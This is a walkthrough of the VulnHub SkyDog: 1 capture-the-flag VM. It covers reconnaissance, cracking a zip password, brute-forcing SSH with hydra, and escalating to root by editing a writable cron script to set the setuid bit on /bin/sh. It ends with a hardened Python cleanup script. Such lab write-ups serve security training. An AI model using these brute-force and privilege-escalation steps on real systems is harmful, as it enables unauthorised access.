SkyDog: 1
References
- https://www.vulnhub.com/entry/skydog-1,142/
- http://www.hackingarticles.in/hack-skydog-vm-ctf-challenge/
Writeup
- Recon:
root@kali:~# nmap -A 10.0.2.145 -p-
...
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
- http://10.0.2.145/ serves only a single image; check its EXIF data:
root@kali:~/Downloads# exiftool SkyDogCon_CTF.jpg
ExifTool Version Number         : 10.28
File Name                       : SkyDogCon_CTF.jpg
...
XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}
...
- Decode the flag: looking the hash up on MD5 Decrypter gives: Welcome Home
- http://10.0.2.145/robots.txt yields flag{cd4f10fcba234f0e8b2f60a490c306e6}
- MD5 Decrypter gives: Bots
- Scan the site with nikto:
root@kali:~/Downloads# nikto -h 10.0.2.145
- Nikto v2.1.6
...
+ Entry '/index.html?' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?hl=/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?hl=*&/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?hl=*&gws_rd=ssl$/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?hl=*&*&gws_rd=ssl/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?gws_rd=ssl$/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?pt1=true$/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Setec/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 299 entries which should be manually viewed.
...
- View the source of http://10.0.2.145/Setec/:
<img src="./Astronomy/Setec_Astronomy.jpg" width="1024" height="768" alt="" />
- Browsing http://10.0.2.145/Setec/Astronomy reveals a file named Whistler.zip
- The archive is password-protected; brute-force it with fcrackzip:
root@kali:~/Downloads# fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt Whistler.zip
found file 'flag.txt', (size cp/uc 50/ 38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc 72/ 61, flags 9, chk 83b5)
PASSWORD FOUND!!!!: pw == yourmother
- This yields flag{1871a3c1da602bf471d3d76cc60cdb9b}, which MD5 Decrypter resolves to: yourmother
- The other file contains a hint:
root@kali:~/Downloads# cat QuesttoFindCosmo.txt
Time to break out those binoculars and start doing some OSINT
- Googling a few of the keywords (binoculars, cosmo, bishop) leads to the movie Sneakers
- Build a wordlist from the movie pages with cewl:
cewl --depth 1 http://www.imdb.com/title/tt0105435/trivia?ref_=tt_trv_trv -w /root/Desktop/sneakers.txt
- or
cewl --depth 1 http://www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt -w /root/Desktop/sneakers.txt
- Brute-force directories with dirb:
root@kali:~/Desktop# dirb http://10.0.2.145 /root/Desktop/sneakers.txt
...
GENERATED WORDS: 22905
---- Scanning URL: http://10.0.2.145/ ----
==> DIRECTORY: http://10.0.2.145/PlayTronics/
==> DIRECTORY: http://10.0.2.145/Setec/
---- Entering directory: http://10.0.2.145/PlayTronics/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.145/Setec/ ----
==> DIRECTORY: http://10.0.2.145/Setec/Astronomy/
---- Entering directory: http://10.0.2.145/Setec/Astronomy/ ----
...
- http://10.0.2.145/PlayTronics/ yields flag{c07908a705c22922e6d416e0e1107d99}, which decrypts to leroybrown
- The other file in that directory is companytraffic.pcap
- Filtering the capture for http in Wireshark reveals an mp3 file whose content is:
Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me.
which is likewise a line from the movie Sneakers (https://www.youtube.com/watch?v=-zVgWpVXb64).
- So wernerbrandes is probably the account name. Using the earlier finding leroybrown, brute-force SSH with hydra; the password turns out to be: leroybrown
hydra -l wernerbrandes -P /root/Desktop/sneakers.txt ssh://10.0.2.145
- Log in over SSH and get flag{82ce8d8f5745ff6849fa7af1473c9b35}, which decrypts to Dr. Gunter Janek
- Look for writable files:
find / -writable -type f 2>/dev/null
This turns up /lib/log/sanitizer.py, a script that empties /tmp/; we assume it runs on a schedule.
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
- Replace rm -r /tmp/* with chmod u+s /bin/sh (note: this sets the setuid bit on the shell). After a while the system runs the script automatically, and the current user ends up in the root group
- Before:
-rwxr-xr-x 1 root root 121272 Feb 19 2014 /bin/dash
- After the script has run:
-rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/dash
- Original privileges:
uid=1001(wernerbrandes) gid=1001(wernerbrandes) groups=1001(wernerbrandes)
- After:
uid=1001(wernerbrandes) gid=1001(wernerbrandes) euid=0(root) groups=0(root),1001(wernerbrandes)
- Run /bin/sh, browse /root, and get flag{b70b205c96270be6ced772112e7dd03f}
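The root cause of the escalation above is a root-run cleanup script that unprivileged users can edit and that shells out to rm. As an added example (not the VM's sanitizer.py), here is how such a cleaner could be written defensively: it refuses to run when its own file is owned by someone other than the expected user or is group/other-writable, and it removes /tmp entries with direct os calls instead of a shell. The function names and the expected_uid parameter are my own choices.

```python
#!/usr/bin/env python3
"""Hardened /tmp cleaner (added example, not the SkyDog VM's script).

A scheduled root script that anyone can edit is a root shell for everyone.
This version checks its own file before doing anything and never passes a
command line to a shell.
"""
import os
import shutil
import stat
import sys


def is_safe_to_run(script_path, expected_uid=0):
    """True only if script_path is owned by expected_uid and carries no
    group/other write bits, i.e. nobody else could have edited it.
    expected_uid defaults to root (0), which is who the cron job runs as."""
    st = os.stat(script_path)
    if st.st_uid != expected_uid:
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def clean_dir(path):
    """Remove every entry directly under path without invoking a shell.
    Returns the number of top-level entries removed."""
    removed = 0
    with os.scandir(path) as entries:
        for entry in entries:
            # Never follow symlinks: a user could point one at /etc.
            if entry.is_dir(follow_symlinks=False):
                shutil.rmtree(entry.path)
            else:
                os.unlink(entry.path)
            removed += 1
    return removed


if __name__ == "__main__":
    me = os.path.abspath(__file__)
    if not is_safe_to_run(me):
        sys.stderr.write("refusing to run: %s is modifiable by others\n" % me)
        sys.exit(1)
    print("removed %d entries from /tmp" % clean_dir("/tmp"))
```

The same ownership/mode check is a cheap thing to run from monitoring over every script referenced by cron or systemd timers, since a writable one is exactly the finding `find / -writable` surfaced here.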